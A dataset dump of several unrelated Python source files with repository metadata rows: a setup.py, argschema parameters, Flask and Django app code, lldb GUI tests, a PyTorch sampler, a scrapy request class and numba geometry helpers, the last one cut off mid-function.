with open(os.path.join(here, 'chantilly', '__version__.py')) as f:
exec(f.read(), about)
setup(
name=NAME,
version=about['__version__'],
description=DESCRIPTION,
long_description=long_description,
long_description_content_type=LONG_DESCRIPTION_CONTENT_TYPE,
author=AUTHOR,
author_email=EMAIL,
license='BSD-3',
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy'
],
packages=find_packages(),
include_package_data=True,
python_requires=REQUIRES_PYTHON,
url=URL,
zip_safe=False,
install_requires=[
'cerberus>=1.3.2',
'river>=0.9.0',
'dill>=0.3.1.1',
'Flask>=1.1.1'
],
extras_require={
'redis': ['redis>=3.5'],
'dev': [
'flake8>=3.7.9',
'mypy>=0.770',
'pytest>=5.3.5',
'pytest-cov>=2.8.1'
]
},
entry_points={
'console_scripts': [
'chantilly=chantilly:cli_hook'
],
}
)
| 29.056338 | 76 | 0.624818 | import io
import os
from setuptools import find_packages, setup
here = os.path.abspath(os.path.dirname(__file__))
# Package meta-data.
NAME = 'chantilly'
DESCRIPTION = 'Deployment tool for online machine learning models'
LONG_DESCRIPTION_CONTENT_TYPE = 'text/markdown'
URL = 'https://github.com/creme-ml/chantilly'
EMAIL = 'maxhalford25@gmail.com'
AUTHOR = 'Max Halford'
REQUIRES_PYTHON = '>=3.7.0'
# Import the README and use it as the long-description.
with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = '\n' + f.read()
# Load the package's __version__.py module as a dictionary.
about = {}
with open(os.path.join(here, 'chantilly', '__version__.py')) as f:
exec(f.read(), about)
setup(
name=NAME,
version=about['__version__'],
description=DESCRIPTION,
long_description=long_description,
long_description_content_type=LONG_DESCRIPTION_CONTENT_TYPE,
author=AUTHOR,
author_email=EMAIL,
license='BSD-3',
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy'
],
packages=find_packages(),
include_package_data=True,
python_requires=REQUIRES_PYTHON,
url=URL,
zip_safe=False,
install_requires=[
'cerberus>=1.3.2',
'river>=0.9.0',
'dill>=0.3.1.1',
'Flask>=1.1.1'
],
extras_require={
'redis': ['redis>=3.5'],
'dev': [
'flake8>=3.7.9',
'mypy>=0.770',
'pytest>=5.3.5',
'pytest-cov>=2.8.1'
]
},
entry_points={
'console_scripts': [
'chantilly=chantilly:cli_hook'
],
}
)
| 0 | 0 | 0 |
d06fd2bcde44153c0b0a860dc6c5189095e2d061 | 1,738 | py | Python | em_stitch/utils/schemas.py | AllenInstitute/em_stitch | 5b24e57b83fdda14cdd7c2bd540c517f68c0569c | [
"BSD-2-Clause"
] | 2 | 2019-04-20T00:28:47.000Z | 2020-01-31T11:12:43.000Z | em_stitch/utils/schemas.py | AllenInstitute/em_stitch | 5b24e57b83fdda14cdd7c2bd540c517f68c0569c | [
"BSD-2-Clause"
] | 14 | 2019-04-22T17:05:11.000Z | 2020-11-03T20:49:35.000Z | em_stitch/utils/schemas.py | AllenInstitute/em_stitch | 5b24e57b83fdda14cdd7c2bd540c517f68c0569c | [
"BSD-2-Clause"
] | 1 | 2020-05-12T17:34:06.000Z | 2020-05-12T17:34:06.000Z | import warnings
from marshmallow.warnings import ChangedInMarshmallow3Warning
from argschema import ArgSchema
from argschema.fields import (
InputDir, InputFile, Float,
Int, OutputFile, Str, Boolean)
warnings.simplefilter(
action='ignore',
category=ChangedInMarshmallow3Warning)
| 35.469388 | 79 | 0.643268 | import warnings
from marshmallow.warnings import ChangedInMarshmallow3Warning
from argschema import ArgSchema
from argschema.fields import (
InputDir, InputFile, Float,
Int, OutputFile, Str, Boolean)
warnings.simplefilter(
action='ignore',
category=ChangedInMarshmallow3Warning)
class GenerateEMTileSpecsParameters(ArgSchema):
metafile = InputFile(
required=True,
description="metadata file containing TEMCA acquisition data")
maskUrl = InputFile(
required=False,
default=None,
missing=None,
description="absolute path to image mask to apply")
image_directory = InputDir(
required=False,
description=("directory used in determining absolute paths to images. "
"Defaults to parent directory containing metafile "
"if omitted."))
maximum_intensity = Int(
required=False, default=255,
description=("intensity value to interpret as white"))
minimum_intensity = Int(
required=False, default=0,
description=("intensity value to interpret as black"))
z = Float(
required=False,
default=0,
description=("z value"))
sectionId = Str(
required=False,
description=("sectionId to apply to tiles during ingest. "
"If unspecified will default to a string "
"representation of the float value of z_index."))
output_path = OutputFile(
required=False,
description="directory for output files")
compress_output = Boolean(
required=False,
missing=True,
default=True,
escription=("tilespecs will be .json or .json.gz"))
| 0 | 1,403 | 23 |
f311ad910ad7272315fb76662295b913c6b7bbed | 435 | py | Python | config.py | zhoukaigo/Blog | ccc72d2eb1c85f68f0cdc6cb17021638dd4c59b9 | [
"MIT"
] | null | null | null | config.py | zhoukaigo/Blog | ccc72d2eb1c85f68f0cdc6cb17021638dd4c59b9 | [
"MIT"
] | null | null | null | config.py | zhoukaigo/Blog | ccc72d2eb1c85f68f0cdc6cb17021638dd4c59b9 | [
"MIT"
] | null | null | null | import os
basedir = os.path.abspath(os.path.dirname(__file__))
| 20.714286 | 82 | 0.701149 | import os
basedir = os.path.abspath(os.path.dirname(__file__))
class config:
SECRET_KEY = os.environ.get('SECRET_KEY') or 'hard to guess string'
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'data-dev.sqlite')
DEBUG = True
OAUTH_CRENDENTIALS = {
'facebook':{
'id': os.environ.get('FACEBOOK_ID_LOCAL'),
'secret': os.environ.get('FACEBOOK_SECRET_LOCAL')
}
}
@staticmethod
def init_app(app):
pass
| 4 | 342 | 23 |
312e3692c41b0390ba6a7a1445764ad07fb9b002 | 3,923 | py | Python | dataset.py | Montherapy/Deep-reinforcement-learning-for-multi-class-imbalanced-classification | 19b9f5f758c9deaf490c942477d01e5e7c2ab94a | [
"MIT"
] | 2 | 2021-11-09T07:28:52.000Z | 2022-03-31T10:50:48.000Z | dataset.py | Montherapy/Deep-reinforcement-learning-for-multi-class-imbalanced-classification | 19b9f5f758c9deaf490c942477d01e5e7c2ab94a | [
"MIT"
] | null | null | null | dataset.py | Montherapy/Deep-reinforcement-learning-for-multi-class-imbalanced-classification | 19b9f5f758c9deaf490c942477d01e5e7c2ab94a | [
"MIT"
] | null | null | null | import tensorflow as tf
import numpy as np
| 49.0375 | 188 | 0.644405 | import tensorflow as tf
import numpy as np
class Dataset:
def __init__(self, config):
self.config = config
self.n_class = len(self.config.new_class)
self.label_connector = {}
self.get_label_changer()
self.set_data(self.config.minority_subsample_rate)
self.get_rho()
def get_label_changer(self):
new_class_setting = self.config.new_class # old classes to new class
for new_label in new_class_setting.keys():
for old_label in new_class_setting[new_label]:
self.label_connector[old_label] = new_label
for new_label, old_label in new_class_setting.items():
print("\nNew label {} = old label".format(new_label), *old_label)
def set_data(self, minority_subsample_rate=1):
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.cifar10.load_data()
# 1. Delete non-used class
survived_class = list(self.label_connector.keys())
self.x_train = x_train[np.isin(y_train, survived_class).squeeze()]
self.x_test = x_test[np.isin(y_test, survived_class).squeeze()]
y_train = y_train[np.isin(y_train, survived_class).squeeze()].reshape(-1, 1)
y_test = y_test[np.isin(y_test, survived_class).squeeze()].reshape(-1, 1)
# 2. Change from old label to new label
self.y_train, self.y_test = -np.ones_like(y_train), -np.ones_like(y_test)
for i, old in enumerate(y_train.squeeze()):
self.y_train[i, 0] = self.label_connector[old]
for i, old in enumerate(y_test.squeeze()):
self.y_test[i, 0] = self.label_connector[old]
# 3. Minor class subsampling for decrease imbalance ratio
if minority_subsample_rate < 1:
# decrease the number of minority class
nums_cls = self.get_class_num()
delete_indices = set()
for minor_cl in self.config.minor_classes:
num_cl = nums_cls[minor_cl]
idx_cl = np.where(self.y_train == minor_cl)[0]
delete_idx = np.random.choice(idx_cl, int(num_cl * (1 - minority_subsample_rate)), replace=False)
delete_indices.update(delete_idx)
survived_indices = set(range(len(self.y_train))).difference(delete_indices)
self.y_train = self.y_train[list(survived_indices)]
self.x_train = self.x_train[list(survived_indices)]
print("\nNumber of each class.")
for cl_idx, cl_num in enumerate(self.get_class_num()):
print("\t- Class {} : {}".format(cl_idx, cl_num))
print("\nImbalance ratio compared to major class.")
for cl_idx, cl_ratio in enumerate(self.get_class_num() / max(self.get_class_num())):
print("\t- Class {} : {:.3f}".format(cl_idx, cl_ratio))
# 4. Data normalization
image_mean = np.array([self.x_train[..., i].mean() for i in range(3)])
self.x_train = (self.x_train - image_mean) / 255
self.x_test = (self.x_test - image_mean) / 255
def get_class_num(self):
# get number of all classes
_, nums_cls = np.unique(self.y_train, return_counts=True)
return nums_cls
def get_rho(self):
"""
In the two-class dataset problem, this paper has proven that the best performance is achieved when the reciprocal of the ratio of the number of data is used as the reward function.
In this code, the result of this paper is extended to multi-class by creating a reward function with the reciprocal of the number of data for each class.
"""
nums_cls = self.get_class_num()
raw_reward_set = 1 / nums_cls
self.reward_set = np.round(raw_reward_set / np.linalg.norm(raw_reward_set), 6)
print("\nReward for each class.")
for cl_idx, cl_reward in enumerate(self.reward_set):
print("\t- Class {} : {:.6f}".format(cl_idx, cl_reward)) | 3,021 | 836 | 23 |
9b18b289fbdc9eebf80838f115db5723f06bf47e | 4,914 | py | Python | hknweb/studentservices/views.py | jyxzhang/hknweb | a01ffd8587859bf63c46213be6a0c8b87164a5c2 | [
"MIT"
] | null | null | null | hknweb/studentservices/views.py | jyxzhang/hknweb | a01ffd8587859bf63c46213be6a0c8b87164a5c2 | [
"MIT"
] | null | null | null | hknweb/studentservices/views.py | jyxzhang/hknweb | a01ffd8587859bf63c46213be6a0c8b87164a5c2 | [
"MIT"
] | null | null | null | from django.shortcuts import render, redirect
from django.urls import reverse
from django.http import JsonResponse
from django.conf import settings
from django.contrib import messages
from django.core.mail import EmailMessage
from django.template.loader import render_to_string
from hknweb.events.views.aggregate_displays.calendar import calendar_helper
from hknweb.events.views.event_transactions.show_event import show_details_helper
from hknweb.utils import allow_public_access
from hknweb.studentservices.models import (
CourseGuideNode,
CourseGuideAdjacencyList,
CourseGuideGroup,
CourseGuideParam,
)
from hknweb.studentservices.forms import DocumentForm, TourRequest
@allow_public_access
@allow_public_access
@allow_public_access
@allow_public_access
@allow_public_access
@allow_public_access
| 29.781818 | 103 | 0.61396 | from django.shortcuts import render, redirect
from django.urls import reverse
from django.http import JsonResponse
from django.conf import settings
from django.contrib import messages
from django.core.mail import EmailMessage
from django.template.loader import render_to_string
from hknweb.events.views.aggregate_displays.calendar import calendar_helper
from hknweb.events.views.event_transactions.show_event import show_details_helper
from hknweb.utils import allow_public_access
from hknweb.studentservices.models import (
CourseGuideNode,
CourseGuideAdjacencyList,
CourseGuideGroup,
CourseGuideParam,
)
from hknweb.studentservices.forms import DocumentForm, TourRequest
@allow_public_access
def resume_critique_submit(request):
form = DocumentForm(request.POST or None, request.FILES or None)
success = request.method == "POST" and form.is_valid()
if success:
form.save()
messages.success(request, "Thank you for submitting your resume!")
return render(
request,
"studentservices/resume_critique.html",
{"form": form, "success": success},
)
@allow_public_access
def reviewsessions(request):
return calendar_helper(request, event_type="Review Session")
@allow_public_access
def show_reviewsession_details(request, id):
return show_details_helper(
request, id, reverse("studentservices:reviewsessions"), False
)
@allow_public_access
def tours(request):
form = TourRequest(request.POST or None)
if request.method == "POST":
if form.is_valid():
form.save()
# Send deprel an email
subject = "Department Tour Request"
officer_email = "deprel@hkn.eecs.berkeley.edu"
html_content = render_to_string(
"studentservices/tour_request_email.html",
{
"name": form.instance.name,
"datetime": form.instance.datetime,
"email": form.instance.email,
"phone": form.instance.phone,
"comments": form.instance.comments,
},
)
msg = EmailMessage(
subject, html_content, settings.NO_REPLY_EMAIL, [officer_email]
)
msg.content_subtype = "html"
msg.send()
messages.success(request, "Your request has been sent!")
return redirect("studentservices:tours")
else:
msg = "Something went wrong! Your request did not send. Try again, or email deprel@hkn.mu."
messages.error(request, msg)
return render(request, "studentservices/tours.html", {"form": form})
@allow_public_access
def course_guide(request):
context = dict()
if CourseGuideParam.objects.exists():
context["params"] = CourseGuideParam.objects.first().to_dict()
context["groups"] = [
g.name for g in CourseGuideGroup.objects.all() if g.name != "Core"
]
return render(request, "studentservices/course_guide.html", context=context)
@allow_public_access
def course_guide_data(request):
group_names = request.GET.get("groups", None)
group_names = group_names.split(",") if group_names else []
group_names.append("Core")
groups = []
for group in CourseGuideGroup.objects.all():
if group_names and group.name not in group_names:
continue
groups.append([node.name for node in group.nodes.all()])
node_groups = dict()
for i, g in enumerate(groups):
i += 1 # Start at group 1
for n in g:
node_groups[n] = i
graph = dict()
for adjacency_list in CourseGuideAdjacencyList.objects.all():
if adjacency_list.source.name not in node_groups:
continue
graph[adjacency_list.source.name] = [
node.name
for node in adjacency_list.targets.all()
if node.name in node_groups
]
course_surveys_link = reverse("course_surveys:index")
link_template = f"{course_surveys_link}?search_by=courses&search_value="
nodes = []
for n in CourseGuideNode.objects.all():
if n.name not in node_groups:
continue
nodes.append(
{
"id": n.name,
"link": link_template + n.name,
"title": n.is_title,
"group": node_groups[n.name],
"fx": n.x_0,
"fy": n.y_0,
}
)
links = []
for s, es in graph.items():
for e in es:
links.append(
{
"source": s,
"target": e,
"source_group": node_groups[s],
"target_group": node_groups[e],
}
)
data = {
"nodes": nodes,
"links": links,
}
return JsonResponse(data)
| 3,953 | 0 | 132 |
f899e276be46e4a405d0eec3da36b75e4e966d04 | 3,695 | py | Python | test/events/unix/test_event_ping_no_response.py | jochenparm/moler | 0253d677e0ef150206758c7991197ba5687d0965 | [
"BSD-3-Clause"
] | 57 | 2018-02-20T08:16:47.000Z | 2022-03-28T10:36:57.000Z | test/events/unix/test_event_ping_no_response.py | jochenparm/moler | 0253d677e0ef150206758c7991197ba5687d0965 | [
"BSD-3-Clause"
] | 377 | 2018-07-19T11:56:27.000Z | 2021-07-09T13:08:12.000Z | test/events/unix/test_event_ping_no_response.py | jochenparm/moler | 0253d677e0ef150206758c7991197ba5687d0965 | [
"BSD-3-Clause"
] | 24 | 2018-04-14T20:49:40.000Z | 2022-03-29T10:44:26.000Z | # -*- coding: utf-8 -*-
__author__ = 'Marcin Usielski'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = 'marcin.usielski@nokia.com'
import time
from moler.events.unix.ping_no_response import PingNoResponse
from moler.util.moler_test import MolerTest
import datetime
| 38.489583 | 108 | 0.685792 | # -*- coding: utf-8 -*-
__author__ = 'Marcin Usielski'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = 'marcin.usielski@nokia.com'
import time
from moler.events.unix.ping_no_response import PingNoResponse
from moler.util.moler_test import MolerTest
import datetime
def test_event_ping_no_response(buffer_connection):
counter = dict()
counter['nr'] = 0
sleep_time = 0.4
max_timeout = 5.0
def callback_fun(param):
param['nr'] += 1
output = "From 192.168.255.126 icmp_seq=1 Destination Host Unreachable"
event = PingNoResponse(connection=buffer_connection.moler_connection, till_occurs_times=2)
event.add_event_occurred_callback(callback=callback_fun, callback_params={'param': counter})
assert 0 == counter['nr']
event.start()
buffer_connection.moler_connection.data_received(output.encode("utf-8"), datetime.datetime.now())
start_time = time.time()
while time.time() - start_time <= max_timeout:
if 1 == counter['nr']:
break
MolerTest.sleep(sleep_time)
assert 1 == counter['nr']
event.pause()
buffer_connection.moler_connection.data_received(output.encode("utf-8"), datetime.datetime.now())
MolerTest.sleep(sleep_time)
assert 1 == counter['nr']
event.resume()
buffer_connection.moler_connection.data_received(output.encode("utf-8"), datetime.datetime.now())
event.await_done()
start_time = time.time()
while time.time() - start_time <= max_timeout:
if 2 == counter['nr']:
break
MolerTest.sleep(sleep_time)
assert 2 == counter['nr']
assert event.done() is True
def test_erase_not_full_line_on_pause(buffer_connection):
import threading
output = "From 192.168.255.126 icmp_seq=1 Destination Host Unreachable"
sleep_time = 0.0005
processed = {'process': 0}
class PingNoResponseDelay(PingNoResponse):
def _process_line_from_output(self, current_chunk, line, is_full_line):
processed['process'] += 1
MolerTest.sleep(seconds=sleep_time)
super(PingNoResponseDelay, self)._process_line_from_output(current_chunk=current_chunk,
line=line, is_full_line=is_full_line)
event = PingNoResponseDelay(connection=buffer_connection.moler_connection, till_occurs_times=2)
event.start()
stopped = threading.Event()
def feed_in_separate_thread():
cnt = 1
while not stopped.isSet():
data = "[{}] abcde\nfghi\njkl".format(cnt)
buffer_connection.moler_connection.data_received(data.encode("utf-8"), datetime.datetime.now())
MolerTest.sleep(sleep_time/10)
cnt += 1
MolerTest.info("feed_in_separate_thread() exited after producing {} records".format(cnt))
tf = threading.Thread(target=feed_in_separate_thread)
tf.start()
start_time = time.time()
while (time.time() - start_time < 4) or (processed['process'] < 300):
event.pause()
MolerTest.sleep(sleep_time)
event.resume()
MolerTest.sleep(sleep_time)
event.pause() # force textual event to drop data from ObserverThreadWrapper queue being flushed
stopped.set()
tf.join()
MolerTest.sleep(1) # allow ObserverThreadWrapper to flush all data from queue
MolerTest.info("Reactivating PingNoResponseDelay event")
event.resume()
buffer_connection.moler_connection.data_received(output.encode("utf-8"), datetime.datetime.now())
buffer_connection.moler_connection.data_received(output.encode("utf-8"), datetime.datetime.now())
event.await_done(timeout=1)
assert event.done() is True
| 3,371 | 0 | 46 |
d3f75757c743ea36ba1c319f15db9a5bfa198f72 | 2,918 | py | Python | lldb/test/API/commands/gui/viewlarge/TestGuiViewLarge.py | acidburn0zzz/llvm-project | 7ca7a2547f00e34f5ec91be776a1d0bbca74b7a9 | [
"Apache-2.0"
] | 250 | 2019-05-07T12:56:44.000Z | 2022-03-10T15:52:06.000Z | lldb/test/API/commands/gui/viewlarge/TestGuiViewLarge.py | acidburn0zzz/llvm-project | 7ca7a2547f00e34f5ec91be776a1d0bbca74b7a9 | [
"Apache-2.0"
] | 410 | 2019-06-06T20:52:32.000Z | 2022-01-18T14:21:48.000Z | lldb/test/API/commands/gui/viewlarge/TestGuiViewLarge.py | acidburn0zzz/llvm-project | 7ca7a2547f00e34f5ec91be776a1d0bbca74b7a9 | [
"Apache-2.0"
] | 50 | 2019-05-10T21:12:24.000Z | 2022-01-21T06:39:47.000Z | """
Test that the 'gui' displays long lines/names correctly without overruns.
"""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test.lldbpexpect import PExpectTest
| 41.098592 | 104 | 0.679232 | """
Test that the 'gui' displays long lines/names correctly without overruns.
"""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test.lldbpexpect import PExpectTest
class GuiViewLargeCommandTest(PExpectTest):
mydir = TestBase.compute_mydir(__file__)
# PExpect uses many timeouts internally and doesn't play well
# under ASAN on a loaded machine..
@skipIfAsan
@skipIfCursesSupportMissing
@skipIfRemote # "run" command will not work correctly for remote debug
@expectedFailureNetBSD
def test_gui(self):
self.build()
# Limit columns to 80, so that long lines will not be displayed completely.
self.launch(executable=self.getBuildArtifact("a.out"), dimensions=(100,80))
self.expect('br set -f main.c -p "// Break here"', substrs=["Breakpoint 1", "address ="])
self.expect("run", substrs=["stop reason ="])
escape_key = chr(27).encode()
left_key = chr(27)+'OD' # for vt100 terminal (lldbexpect sets TERM=vt100)
right_key = chr(27)+'OC'
ctrl_l = chr(12)
# Start the GUI and close the welcome window.
self.child.sendline("gui")
self.child.send(escape_key)
# Check the sources window.
self.child.expect_exact("Sources")
# The string is copy&pasted from a 80-columns terminal. It will be followed by some
# kind of an escape sequence (color, frame, etc.).
self.child.expect_exact("int a_variable_with_a_very_looooooooooooooooooooooooooo"+chr(27))
# The escape here checks that there's no content drawn by the previous line.
self.child.expect_exact("int shortvar = 1;"+chr(27))
# Check the triggered breakpoint marker on a long line.
self.child.expect_exact("<<< Thread 1: breakpoint 1.1"+chr(27))
# Check the variable window.
self.child.expect_exact("Variables")
self.child.expect_exact("(int) a_variable_with_a_very_looooooooooooooooooooooooooooooo"+chr(27))
self.child.expect_exact("(int) shortvar = 1"+chr(27))
# Scroll the sources view twice to the right.
self.child.send(right_key)
self.child.send(right_key)
# Force a redraw, otherwise curses will optimize the drawing to not draw all 'o'.
self.child.send(ctrl_l)
# The source code is indented by two spaces, so there'll be just two extra 'o' on the right.
self.child.expect_exact("int a_variable_with_a_very_looooooooooooooooooooooooooooo"+chr(27))
# And scroll back to the left.
self.child.send(left_key)
self.child.send(left_key)
self.child.send(ctrl_l)
self.child.expect_exact("int a_variable_with_a_very_looooooooooooooooooooooooooo"+chr(27))
# Press escape to quit the gui
self.child.send(escape_key)
self.expect_prompt()
self.quit()
| 2,321 | 350 | 23 |
f3a3e3128a63e5c3648c9b0836ff421e5f592630 | 2,021 | py | Python | src/gedml/core/samplers/m_per_class_sampler.py | wangck20/GeDML | 1f76ac2094d7b88be7fd4eb6145e5586e547b9ca | [
"MIT"
] | null | null | null | src/gedml/core/samplers/m_per_class_sampler.py | wangck20/GeDML | 1f76ac2094d7b88be7fd4eb6145e5586e547b9ca | [
"MIT"
] | null | null | null | src/gedml/core/samplers/m_per_class_sampler.py | wangck20/GeDML | 1f76ac2094d7b88be7fd4eb6145e5586e547b9ca | [
"MIT"
] | null | null | null | import torch
from torch.utils.data.sampler import Sampler
from collections import defaultdict
import numpy as np
class MPerClassSampler(Sampler):
"""
Give m samples per class.
Args:
labels (np.ndarray):
Ground truth of datasets
m (int):
M samples per class
batch_size (int):
Batch size must be an interger multiple of m
"""
| 31.092308 | 84 | 0.606136 | import torch
from torch.utils.data.sampler import Sampler
from collections import defaultdict
import numpy as np
def safe_random_choice(input_list, size):
replace = len(input_list) < size
return np.random.choice(input_list, size=size, replace=replace)
class MPerClassSampler(Sampler):
"""
Give m samples per class.
Args:
labels (np.ndarray):
Ground truth of datasets
m (int):
M samples per class
batch_size (int):
Batch size must be an interger multiple of m
"""
def __init__(
self,
labels,
m,
batch_size,
):
# raise NotImplementedError()
self.labels = labels
self.m = m
self.batch_size = batch_size
self.init_indices()
def init_indices(self):
# construct indices
self.labels_to_indices = defaultdict(list)
for i, label in enumerate(self.labels):
self.labels_to_indices[label].append(i)
for k, v in self.labels_to_indices.items():
self.labels_to_indices[k] = np.array(v).astype('int')
self.labels_set = list(self.labels_to_indices.keys())
self.list_size = self.m * len(self.labels_set)
# assert
assert self.list_size >= self.batch_size
assert self.batch_size % self.m == 0
self.list_size -= self.list_size % self.batch_size
self.num_iters = self.list_size // self.batch_size
def __len__(self):
return self.list_size
def __iter__(self):
idx_list = [0] * self.list_size
i = 0
for _ in range(self.num_iters):
np.random.shuffle(self.labels_set)
curr_labels_set = self.labels_set[:self.batch_size // self.m]
for label in curr_labels_set:
curr_indices = self.labels_to_indices[label]
idx_list[i:i+self.m] = safe_random_choice(curr_indices, size=self.m)
i += self.m
return iter(idx_list)
| 1,471 | 0 | 146 |
5eb7587882143368b5cdfa592d36c79d3b11a897 | 403 | py | Python | scrapy_framework/html/request.py | savor007/scrapy_framework | 9f1266eb2d4bb7e181d1c5352b05298e77040980 | [
"MIT"
] | null | null | null | scrapy_framework/html/request.py | savor007/scrapy_framework | 9f1266eb2d4bb7e181d1c5352b05298e77040980 | [
"MIT"
] | null | null | null | scrapy_framework/html/request.py | savor007/scrapy_framework | 9f1266eb2d4bb7e181d1c5352b05298e77040980 | [
"MIT"
] | null | null | null | class Request(object):
"""
create a instance of Request
""" | 28.785714 | 110 | 0.595533 | class Request(object):
"""
create a instance of Request
"""
def __init__(self, url, method="GET", headers=None, cookies=None, data=None, callback='parse', meta=None):
self.url = url
self.method = method
self.headers = headers
self.cookies = cookies
self.data = data
self.callback=callback
self.meta=meta
self.spidername="" | 305 | 0 | 27 |
2f0322c38d68b54d2529d694030c2dbd8557d296 | 1,476 | py | Python | astronomi/forms.py | hvarmis21/houseofapps | 185d654d4403bd6bcf6fda5e3c9f5ad6efde2976 | [
"MIT"
] | null | null | null | astronomi/forms.py | hvarmis21/houseofapps | 185d654d4403bd6bcf6fda5e3c9f5ad6efde2976 | [
"MIT"
] | 4 | 2021-03-18T23:31:45.000Z | 2021-09-22T18:32:21.000Z | astronomi/forms.py | hvarmis21/houseofapps | 185d654d4403bd6bcf6fda5e3c9f5ad6efde2976 | [
"MIT"
] | null | null | null | from django import forms
from django.contrib.auth import authenticate
from django.contrib.auth.models import User
| 39.891892 | 107 | 0.682927 | from django import forms
from django.contrib.auth import authenticate
from django.contrib.auth.models import User
class LoginForm(forms.Form):
username = forms.CharField(max_length=30, label="Kullanıcı Adı Giriniz")
password = forms.CharField(max_length=30, label="Parola Giriniz", widget=forms.PasswordInput)
def clean(self):
username = self.cleaned_data.get('username')
password = self.cleaned_data.get('password')
if username and password:
user = authenticate(username=username, password=password)
if not user:
raise forms.ValidationError("Kullanıcı adını ya da parolayı yanlış girdiniz!")
return super(LoginForm, self).clean()
class RegisterForm(forms.ModelForm):
username = forms.CharField(max_length=30, label="Kullanıcı Adı Giriniz")
password1 = forms.CharField(max_length=30, label="Parola Giriniz", widget=forms.PasswordInput)
password2 = forms.CharField(max_length=30, label="Parolayı Tekrar Giriniz", widget=forms.PasswordInput)
class Meta:
model = User
fields = [
'username',
'password1',
'password2',
]
def clean_password2(self):
password1 = self.cleaned_data.get('password1')
password2 = self.cleaned_data.get('password2')
if password1 and password2 and password1 != password2:
raise forms.ValidationError("Parolalar Eşleşmiyor!!")
return password2
| 649 | 682 | 45 |
1e6a136f2dc13323d6a0e69530cf58722831ce88 | 5,126 | py | Python | bomeba0/utils/geometry.py | aloctavodia/bomeba0 | e212986d8ee60be1da91d63a7a889db14ec851c3 | [
"Apache-2.0"
] | null | null | null | bomeba0/utils/geometry.py | aloctavodia/bomeba0 | e212986d8ee60be1da91d63a7a889db14ec851c3 | [
"Apache-2.0"
] | 28 | 2017-06-01T15:46:33.000Z | 2021-07-01T18:28:36.000Z | bomeba0/utils/geometry.py | aloctavodia/bomeba0 | e212986d8ee60be1da91d63a7a889db14ec851c3 | [
"Apache-2.0"
] | 6 | 2017-09-30T13:26:08.000Z | 2022-02-13T10:01:18.000Z | """
A collection of common mathematical functions written for high performance with
the help of numpy and numba.
"""
import numpy as np
from math import sin as msin
from math import cos as mcos
from numba import jit
@jit
def dist(p, q):
"""
Compute distance between two 3D vectors
p: array
Cartesian coordinates for one of the vectors
q: array
Cartesian coordinates for one of the vectors
"""
return ((p[0] - q[0])**2 + (p[1] - q[1])**2 + (p[2] - q[2])**2)**0.5
@jit
def dot(p, q):
"""
Compute dot product between two 3D vectors
p: array
Cartesian coordinates for one of the vectors
q: array
Cartesian coordinates for one of the vectors
"""
return p[0] * q[0] + p[1] * q[1] + p[2] * q[2]
@jit
def cross(p, q):
"""
Compute cross product between two 3D vectors
p: array
Cartesian coordinates for one of the vectors
q: array
Cartesian coordinates for one of the vectors
"""
xyz = np.zeros(3)
xyz[0] = p[1] * q[2] - p[2] * q[1]
xyz[1] = p[2] * q[0] - p[0] * q[2]
xyz[2] = p[0] * q[1] - p[1] * q[0]
return xyz
@jit
def mod(p):
"""
Compute modulus of 3D vector
p: array
Cartesian coordinates
"""
return (p[0]**2 + p[1]**2 + p[2]**2)**0.5
@jit
def normalize(p):
"""
Compute a normalized 3D vector
p: array
Cartesian coordinates
"""
return p / mod(p)
@jit
def perp_vector(p, q, r):
"""
Compute perpendicular vector to (p-q) and (r-q) centered in q.
"""
v = cross(q - r, q - p)
return v / mod(v) + q
def get_angle(a, b, c):
"""
Compute the angle given 3 points
xyz: array
Cartesian coordinates
a-c: int
atom index for the three points defining the angle
"""
ba = a - b
cb = c - b
ba_mod = mod(ba)
cb_mod = mod(cb)
val = dot(ba, cb) / (ba_mod * cb_mod)
# better fix?
if val > 1:
val = 1
elif val < -1:
val = -1
return np.arccos(val)
# this function is the same as get_torsional_array, except that the last one need an xyz-array and
# this one do not.
def get_torsional(a, b, c, d):
"""
Compute the torsional angle given four points
a-d: int
atom index for the four points defining the torsional
"""
# Compute 3 vectors connecting the four points
ba = b - a
cb = c - b
dc = d - c
# Compute the normal vector to each plane
u_A = cross(ba, cb)
u_B = cross(cb, dc)
#Measure the angle between the two normal vectors
u_A_mod = mod(u_A)
u_B_mod = mod(u_B)
val = dot(u_A, u_B) / (u_A_mod * u_B_mod)
# better fix?
if val > 1:
val = 1
elif val < -1:
val = -1
tor_rad = np.arccos(val)
# compute the sign
sign = dot(u_A, dc)
if sign > 0:
return tor_rad
else:
return -tor_rad
def get_torsional_array(xyz, a, b, c, d):
"""
Compute the torsional angle given four points
xyz: array
Cartesian coordinates
a-d: int
atom index for the four points defining the torsional
"""
# Compute 3 vectors connecting the four points
ba = xyz[b] - xyz[a]
cb = xyz[c] - xyz[b]
dc = xyz[d] - xyz[c]
# Compute the normal vector to each plane
u_A = cross(ba, cb)
u_B = cross(cb, dc)
# Measure the angle between the two normal vectors
u_A_mod = mod(u_A)
u_B_mod = mod(u_B)
val = dot(u_A, u_B) / (u_A_mod * u_B_mod)
# better fix?
if val > 1:
val = 1
elif val < -1:
val = -1
tor_rad = np.arccos(val)
# compute the sign
sign = dot(u_A, dc)
if sign > 0:
return tor_rad
else:
return -tor_rad
@jit
def rotation_matrix_3d(u, theta):
"""Return the rotation matrix due to a right hand rotation of theta radians
around an arbitrary axis/vector u.
u: array
arbitrary axis/vector u
theta: float
rotation angle in radians
"""
x, y, z = normalize(u)
st = msin(theta)
ct = mcos(theta)
